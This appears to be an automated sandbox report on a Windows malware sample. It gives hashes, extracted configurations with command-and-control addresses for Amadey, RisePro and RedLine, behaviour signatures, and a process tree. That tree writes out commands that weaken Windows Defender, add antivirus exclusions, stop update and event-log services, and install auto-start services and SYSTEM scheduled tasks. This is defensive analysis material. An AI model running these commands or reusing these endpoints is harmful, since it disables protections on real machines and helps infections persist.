Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    21-06-2024 01:12

General

  • Target

    3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603.exe

  • Size

    1.8MB

  • MD5

    20fe52f3ba934b9b7454c194f44d74d0

  • SHA1

    f38c3041926f329dac459bacce67850dc58ab15a

  • SHA256

    3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603

  • SHA512

    de74eaa8fcd2dc40da40f09e4c69f41c63282c1d70f352fe3e6f0b7ef70318f5252e520574d428f1bd5c24dc6d55acab9f109b6a6c36718df1f9ead25effccfc

  • SSDEEP

    24576:1/JK2aIjA7qco3fFT9eSzR160c8LE8x+dyh9tfzHEBZ/QJc0erHIuoDaFtTNihZi:VlfA7kvFJRPpAC+UdTmtQCtouortLka

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

C2

http://147.45.47.155

Attributes
  • install_dir

    9217037dc9

  • install_file

    explortu.exe

  • strings_key

    8e894a8a4a3d0da8924003a561cfb244

  • url_paths

    /ku4Nor9/index.php

rc4.plain

Extracted

Family

risepro

C2

77.91.77.66:58709

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

newbild

C2

185.215.113.67:40960

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 37 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603.exe
    "C:\Users\Admin\AppData\Local\Temp\3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1988
    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2676
      • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:1136
      • C:\Users\Admin\1000015002\609397bef6.exe
        "C:\Users\Admin\1000015002\609397bef6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:944
        • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:1116
          • C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:852
            • C:\Users\Admin\AppData\Local\Temp\onefile_852_133634060077062000\stub.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1472
          • C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
            "C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2224
          • C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
            "C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
            5⤵
            • Executes dropped EXE
            PID:2360
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 52
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:3096
          • C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe
            "C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:3256
            • C:\Users\Admin\AppData\Local\Temp\da_protected.exe
              "C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:3372
              • C:\Users\Admin\AppData\Local\Temp\wumqot.exe
                "C:\Users\Admin\AppData\Local\Temp\wumqot.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                PID:1960
                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                  setup.exe
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:768
                  • C:\Users\Admin\AppData\Local\Temp\setup-a6648e356d716c7a\setup.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup-a6648e356d716c7a\setup.exe"
                    9⤵
                    • Executes dropped EXE
                    PID:2496
          • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
            5⤵
            • Executes dropped EXE
            PID:3520
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3520 -s 84
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:3564
          • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
            5⤵
            • Executes dropped EXE
            PID:3656
          • C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
            "C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:4080
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              6⤵
                PID:3368
            • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
              "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              PID:3476
              • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                PID:1812
                • C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1404
                  • C:\Users\Admin\AppData\Local\Temp\7zSECEE.tmp\Install.exe
                    .\Install.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2892
                    • C:\Users\Admin\AppData\Local\Temp\7zSEE84.tmp\Install.exe
                      .\Install.exe /dfukLdidqzt "385119" /S
                      9⤵
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Enumerates system info in registry
                      PID:584
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        10⤵
                          PID:1060
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                            11⤵
                              PID:3532
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                12⤵
                                  PID:3540
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    13⤵
                                      PID:3048
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                  11⤵
                                    PID:2108
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      12⤵
                                        PID:1516
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          13⤵
                                            PID:2060
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                        11⤵
                                          PID:2292
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                            12⤵
                                              PID:112
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                13⤵
                                                  PID:2524
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                              11⤵
                                                PID:1100
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  12⤵
                                                    PID:1976
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      13⤵
                                                        PID:1872
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                    11⤵
                                                      PID:3040
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                        12⤵
                                                          PID:1704
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                            13⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Drops file in System32 directory
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1772
                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                              14⤵
                                                                PID:2156
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                        10⤵
                                                          PID:3796
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            11⤵
                                                              PID:3720
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                12⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Drops file in System32 directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3836
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                  13⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3608
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 01:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\YGTopDo.exe\" oU /rZgdidrM 385119 /S" /V1 /F
                                                            10⤵
                                                            • Drops file in Windows directory
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3904
                                                    • C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Drops file in System32 directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3036
                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Drops file in System32 directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1064
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                        8⤵
                                                          PID:2104
                                                          • C:\Windows\system32\wusa.exe
                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                            9⤵
                                                            • Drops file in Windows directory
                                                            PID:2256
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3532
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:2108
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:1872
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop bits
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:2564
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop dosvc
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:356
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                          8⤵
                                                          • Power Settings
                                                          PID:1564
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                          8⤵
                                                          • Power Settings
                                                          PID:3008
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                          8⤵
                                                          • Power Settings
                                                          PID:3572
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                          8⤵
                                                          • Power Settings
                                                          PID:1072
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3020
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3044
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop eventlog
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3808
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe start "WSNKISKT"
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3712
                                                      • C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:3820
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS667.tmp\Install.exe
                                                          .\Install.exe
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:3776
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS86A.tmp\Install.exe
                                                            .\Install.exe /Rdprdidxe "385134" /S
                                                            9⤵
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Enumerates system info in registry
                                                            PID:1428
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                              10⤵
                                                                PID:3488
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                  11⤵
                                                                    PID:1948
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                      12⤵
                                                                        PID:3484
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                          13⤵
                                                                            PID:1604
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                        11⤵
                                                                          PID:1616
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                            12⤵
                                                                              PID:1268
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                13⤵
                                                                                  PID:324
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                              11⤵
                                                                                PID:1732
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                  12⤵
                                                                                    PID:2300
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                      13⤵
                                                                                        PID:580
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                    11⤵
                                                                                      PID:1600
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        12⤵
                                                                                          PID:2484
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                            13⤵
                                                                                              PID:392
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                          11⤵
                                                                                            PID:1064
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              12⤵
                                                                                                PID:2924
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                  13⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:2368
                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    14⤵
                                                                                                      PID:2488
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                              10⤵
                                                                                                PID:3816
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                  11⤵
                                                                                                    PID:3756
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                      12⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:3740
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                        13⤵
                                                                                                          PID:1612
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 01:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\fzAYJsJ.exe\" oU /KcAdidtm 385134 /S" /V1 /F
                                                                                                    10⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2276
